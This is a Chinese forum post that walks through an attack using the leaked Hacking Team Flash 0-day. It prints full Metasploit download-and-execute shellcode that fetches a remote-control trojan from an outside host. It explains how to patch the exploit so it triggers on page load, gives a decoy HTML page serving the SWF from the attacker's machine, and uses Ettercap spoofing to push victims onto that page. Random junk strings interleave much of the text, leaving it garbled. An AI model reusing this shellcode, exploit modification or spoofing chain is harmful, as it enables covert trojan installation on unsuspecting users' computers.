|
5 K' A! D0 Y, h6 m5 W2 X
三、flash 0day之手工代码修改制作下载者实例入侵演示 ( {1 U$ e4 Q" L) q4 H1 m
- m( _$ y$ f3 O6 y: W9 A5 S/ }7 B) M0 c+ T, Y# R U2 O- c
利用到的工具:
5 f! c- W$ ]$ G: l9 A4 P# |6 ] 9 O- M& G+ F( y4 ?
) x$ o2 K$ p1 h6 S; ]. I: e Msf - |) Q/ d# k+ {
" Q+ V% ^5 g0 b; f: a/ p
9 T0 I) H9 Y" |) C Ettercap 8 _! U% G H8 J5 B; M
1 I# t2 p8 T+ }' y g# g' ^6 Q( j8 Q. m' @+ G4 g. E" p6 S; r
Adobe Flash CS6
6 [9 R6 v. `$ F- c
3 _; l5 u& m9 N$ O% Z% ?( r( Q1 t4 O$ Q
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 x$ I- P3 d; O0 J9 i
9 Z/ q# h! ] J$ v6 D+ t& b
: a' T3 f! ^2 t {; i9 @
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 5 H+ t2 A! X0 f" \8 A
+ F+ o- o' D* y6 e, H- ?: F' W, X- g6 e& \* ]$ k ~
如图: $ w: W1 o4 B# z; T2 ] z5 x& z
4 ?8 X, A. |2 C" ?) W/ D! ~& f
$ t" z1 B3 G5 U b5 u3 x
u1 I* n% w8 O( h0 Y" i0 i0 e: Z- T # j9 k# C: j6 t# n5 ~" v
0 q$ H- ]% v: M/ ^
7 f" j0 {1 F+ A+ D0 s) z 8 a3 d6 F. x6 O% E2 Q; `0 c% p1 z
; c6 V6 U2 h8 f: u 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
( w) {& c; h- \5 V. ?
* j4 C; b( T+ v6 w7 d
F2 [# t9 s2 X$ Z: V7 `6 u * D9 b1 c! T& k- K
4 l0 Y Z. W* _" {" ]
* u# o/ f$ V8 [6 r) o+ t+ I
 / E* Y- h# L( r/ F9 r
- p5 d& a( s" @3 t: G7 M* U
1 j, M. f: F. w6 V* J* @0 D3 |; }
然后执行generate -t dword生成shellcode,如下:
. q" q. D1 r6 ?0 ^& I9 B# x ) [6 [) X$ O: z6 n
3 ~+ p4 V8 o# E/ h7 r. l! S  / `2 b+ u1 z0 q% g4 h% W
6 }- t: q$ L' l
l: A6 T. _( }4 u6 a u0 K 复制代码到文本下便于我们一会编辑flash exp,如下:
+ N" a" _3 c* P0 w8 m+ A+ \6 K
% I9 U2 I! a; X+ D
; g. G8 z; k7 n' _# H2 E# c" X 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
2 Q4 ~3 y* N0 P' k K1 w
: I; G5 v! k% \
0 I# r3 b/ L6 F% R+ k& A3 l 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " F1 O' i: y( c( M: p$ k; h
) N( I4 [5 ~# Z
0 ?, F% \& B9 N" X2 N% q 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ' Z* M) ?' a6 q& D$ m! ]& u
$ c1 [; x% Y2 L5 C6 b/ G5 Z* k
: G- u6 K+ [6 f0 O+ D4 u 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, : K- e: E! E8 |3 o% j0 _8 F
$ k& P3 W% D' Z# n1 a0 l% q
3 R3 {9 t( f' b7 Q8 Q 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
+ Z" `/ O6 Q3 Z2 \
$ J/ p0 P$ ?: ~: v& g9 I1 W% p8 f/ K, q: e9 G9 z5 v! H
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
, O# ?: N7 k2 E$ O 0 x" G. l. j5 I$ K7 a ~
+ d5 j& m% w- Z4 b0 b) [" C( T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ' [' I; C4 l9 H& F
0 E) {4 q) S& @- l8 m: N! t8 h
4 X+ D% D6 C4 y% |* e
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
/ y6 y' @$ E0 A% w( K' y3 P
& P0 T7 X. L; o7 ]# n# a+ V% z
E4 _; |4 A5 K 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, % Y6 g2 o1 }; U5 \" r9 s' M# E
* H1 F a, s6 E0 c. [# c3 S
& c. Z' S) I+ G. I" Z 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
% h) V" J# O2 l' ?
! W- R/ l; R* s) K7 n4 C. O) ]* c1 { |. l
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
3 f' O. G" j" Y2 b: l0 o) V
5 z% h9 ~0 O2 N i% W& k: ~+ v8 l8 j8 ~. j, Z
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
- B9 ?1 i/ F4 l, S ]* t6 x
! ?" m; F# u# }5 F& o' k+ H' y4 M3 P7 W1 \6 P& u# E( k2 V
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 5 f; l0 T$ h$ M# p4 c+ o: v
5 x. c/ C, q0 v0 a( R6 {
, w0 o* S4 V* j9 P+ M5 C9 [8 Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # e% k( a$ n: U
% i: K# M6 w6 K6 |5 T: e
2 v3 K* p4 C& b0 a# y2 S8 V1 Y+ R
* G& `( B6 L; ~( k) c
# _7 [6 c6 S' Q0 A9 R3 k1 Z
4 T( h; ^ Q: n% k1 O( @4 q, ~
3 f' y0 C% j7 G" R
1 g( J# L9 W T3 ^( L. V, L
9 J" {# v/ J9 s5 V3 ^+ E 下面我们来修改flash 0day exp,需要修改三个文件,分别为: # G" q- ]' X* L
9 m9 Q0 Y) u+ c% ?
8 k- M b1 r& E. [
 6 z8 O \3 M. o9 J8 ^: q( h5 A# K( R
; i# h- B& F( P' u
) J' _- }, O, h; c, U4 P 先修改ShellWin32.as,部分源代码如图: 7 u2 j' h! H1 Z" L
( V. s/ W# A2 `# j9 v" w9 p
* N$ Z9 f/ \% u2 F6 [! y' V4 s  ) g4 U5 Z/ v/ Y% w* u v. Y
( F3 G. j0 I2 R8 b0 M# c
* U# _( `: |; s* Y( v
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
) f% U% I) |- i
) M6 {! C9 r5 u |: X2 Q' j+ M) u' m) [. ~1 G7 x; z$ y
 * n- O# N$ K g; _* `$ \3 J7 \
- \" [) c0 V) Q" [+ j; i: |) P( B7 p* I& H$ G
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
' K! g8 O# [& D
& \" |, `. h; t: W8 b6 [
( W* a# z$ ?% _3 U 
F0 x6 r/ d3 K
! S; v2 `; i$ W# j9 o, g: Y
* s: r8 j Z8 M) s+ | 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 B' O! x- V' J6 \
8 H4 \) L( \; F) s4 O% [
7 M+ y2 }! I# V) L5 I8 V 8 E4 z% Y9 h) K; L+ z* C- O
0 I' n3 I* r7 s0 b% Y
0 a% U7 s( \) P. }
# F. ` Z; D+ R( k5 ]' B# W' U8 j( p
8 ?: B9 n3 l! t
7 R5 b3 g" h) q q% |0 M7 u  6 g* o/ n m4 O/ h5 ?/ N
7 R2 s" ?2 ^. o! H, e' O2 Z
! r9 `2 @7 B. ~5 A, k- r; f 然后点保存,下面我们来编译一下,打开 0 x$ K& N! z% w* Y7 N: H
' ]5 B! n& ]( z
9 |# ]! f( t* B' }* F2 z, Z. V. | exp1.fla然后点文件-发布,看看编译没错误 6 n- t @4 X8 W( N% Z; ~ f) L
: n3 J. _: Q- `0 @3 K
- s: [7 j) f1 {9 @7 \: [ - p8 Z7 m8 w ]: C( e) o3 |( D
* B$ r3 W. r' V+ j
) `( E( t; A' m5 A1 I0 R1 t
, K+ d3 V) w/ ?9 e) a$ K
/ r; q; N- k( d- _9 w4 c/ F) j; v
5 w" u8 {3 u" o4 |
- V$ v4 P9 D' t8 J% f, V 0 G- k- z' n; J0 q
8 z3 F- c$ ]' [) J3 R 
) U7 L8 I0 d& V3 I0 `
% o# \ X! T1 n& W9 t- a( t/ o
]) H+ C' p- K, X3 P 然后我们把生成的 2 E9 Z7 b: p$ A
& v1 Q, x" p6 h$ C
* ?) O* ~2 |4 R# ? exp1.swf丢到kailinux 的/var/www/html下:
) w: d1 @1 `: b/ m) P
# o: ?) n: F7 c9 P9 T' z8 J: T9 P* Y; L
然后把这段代码好好编辑一下 # T6 h( K7 _/ v4 d; x1 D# q
3 p& k+ T$ e5 Z+ M
' s( E8 Y: v& l2 q$ H
2 O" Q5 y2 x" K' r
5 L# ]* E0 R1 ^! U
, q5 g6 Z) v% k
# ?' S% C1 J0 u
$ U4 z) z; \/ Y0 Y) J' ?
, ^/ ^9 K, C0 p T( h7 A - V m8 u& U/ N7 V* g# N# P
% E/ ?4 ~* J$ I
9 x/ P, C- I6 w: @
+ t/ e- {, }: h1 v9 t, T4 f
8 F1 m0 m- s. e+ B' p$ \/ w w0 t( }: T8 ~6 _3 n
9 i) k4 C& R, ` d1 i3 U" i) m
- ?6 e1 m8 }# }+ g, s" ^2 K4 G% r- L( J+ i" _
4 S) _) i! K' l3 z$ R 0 v5 o4 p0 p/ \3 Z
" `! r; C6 N# y0 h3 N <!DOCTYPE html>
% \9 O1 o: v, F! @ $ q6 n9 X: r" u p4 y& _6 R
4 a n4 Y. G9 b7 c- Y/ J
<html>
# u8 a; r w g# H + k, l: M% i' J1 R' m0 y, }3 U
* ^+ w$ c/ A- c& ^. k <head> 5 S5 c; ], m& g) A6 b
& e9 b* x+ Y- h0 ^ W* A4 J1 b
0 s) |; @- M" b/ `- L P" ^1 c
<meta http-equiv="Content-Type" content="text/html; 4 j& r) z( n" h% L/ `
$ p$ G- ~/ S, x+ T3 ?- h
; v- l+ s/ k+ M& Y: J( [$ ^
charset=utf-8"/> 3 B! [8 l$ T1 c
: a& n" O' E w1 w8 j
+ l# y1 Z( C5 R. ^
</head>
1 b+ b) m2 K2 x9 c 9 p, x& v t: _/ ^
5 a* T: i6 I7 e9 U) k <body> 5 u& r2 o( f1 m% A
9 I% p( d! u* A# {$ F- \( r7 b9 s% L) E- w4 Z }1 a2 w
<h2> Please wait, the requested page is loading...</h2>
5 w9 B" p! q$ m, Z 6 x- U( ?; [3 {
; \: U, p+ d( d+ j, s <br>
0 r( _ G. G! ]+ w6 f
8 i A2 `' O, C# W: h$ A% U7 R" s! q. ]0 \3 R# y* q
<OBJECT ' L7 A& Z/ J: d- Z9 H. ?6 p( A
& G9 D& F5 u3 D4 M& C
8 C7 B$ F6 W% j/ S
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
5 i& `" Z3 ]( H) D1 X
0 s0 I" y, r4 _3 F; g5 @
1 r4 i- _' h" w& B VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' C' U0 h3 D1 }0 l, ~, r! a ' W& `: y( ?" C* I, \6 }( P4 t
0 ^, h( K; D' b: j, e) v </body> 2 D2 q+ W, y( Z! ]# }" G* i) a
5 e: X; B1 ^* s) d, f- S/ P# s
! w2 k; L* C8 K/ q1 ]9 |
<script> $ Y8 b7 K: q/ d b5 m2 I
- u- n1 _. x- K. |) J
) M$ G- |2 `' r6 M8 e% w setTimeout(function () { 3 C6 ?+ n+ F% n4 o, h0 W8 j" Y! Q
4 t% b/ c) i2 r+ Q* B# U$ a3 m( W1 E# X5 \0 J% l8 c( m- ?
% R, c. D( b' |8 G# a* @4 x/ y+ C" z+ _ Z/ g) q' J) f% J
7 }7 d4 H; v+ q2 H- ?/ l7 |2 E9 S
window.location.reload();
* c( [2 b# m/ H
0 p _0 y- ~4 d' z7 A5 c
9 X4 l. L2 ^* m. n" s }, 10000);
2 T: O B$ v8 J/ E, R4 t5 o
& n. T8 _8 D. d6 H. K0 p. e. ~! G# c
$ u; U4 v6 C7 q+ w, L3 |& ^% o
$ G2 O! m' K5 b& t; L1 V; C& n8 j4 C+ Q
</script>
7 C4 G: S6 [! f3 T) l
' ]/ h2 L* u. x0 l6 ~+ i
I- Z9 ?( R# ^' z/ L5 c3 R </html>
1 y! m6 M2 f1 `
5 K% `2 J1 `) S+ \: r
0 k9 h, N. E' h 4 ^; i. M- b W0 k8 ~; m u
# ?; p5 f: W \8 b8 `5 U! J" y. S8 S0 R i+ E: e' _: P i
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
- Q& j0 K" f/ S2 h
7 w- m) _ i2 r8 Y% ~% h1 S1 ?2 K
% q- z I4 j$ B/ M8 f x/ } m. i/ l4 E) ?
! X' ~6 `" U( H6 b6 S" {
3 Z7 b% L/ A5 J/ }
! ^( W: G7 o$ L4 \6 |% f, p
j) f; o# B7 q( M3 A 3 c+ ]* {0 {9 M3 M! [6 | W
# f* h) j7 I5 g, b& V+ ]: O
- M) @& U; D- W& w. Q9 p. E! m" S ' r! U) r" h1 _
5 l& ]+ W5 k& \! s0 `
; e7 u) G, X( i0 f" W * A% f3 U- h- P
6 a! ~! X d A- W3 ~/ i2 B
' `6 }5 Y1 D* `3 K5 v3 M5 T 下面我们用ettercap欺骗如图: ) V1 {- j9 z, D. g
: v. d% s, k( P2 L8 y7 u# }/ j2 d6 x9 K. e+ j
: k# l* N, u- [
$ Q1 T6 F1 ]/ u+ }6 U2 E+ y. a# z! Q/ S
$ b. ?( I( ^1 g8 W
q. W( |1 X+ c
3 V$ e0 t, F1 M4 K
下面我们随便访问个网站看看:
/ N7 f7 @+ H% i) G: ~" g9 D7 \
& c8 p8 f; E. t" V, Z$ Q/ b# X$ ^
) \" ?5 ~" f3 l* }, Z6 g 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) A$ i( e$ `% e! I9 V$ Y
" }- E! A3 J: A
/ h* S' L- x% K4 `7 i4 G  6 N9 X- R$ |4 I" E
6 I* I' Z5 @! U; n8 K
0 {6 v- N) j- L6 S) Y 我们看另一台, . H% j6 C* o4 L
- O$ b: W; S8 l1 k3 n7 C, \% i. G8 W' @& T8 Q% d& n# {3 W) [
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 # i; L2 }- k9 L! Z! x1 R/ P
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对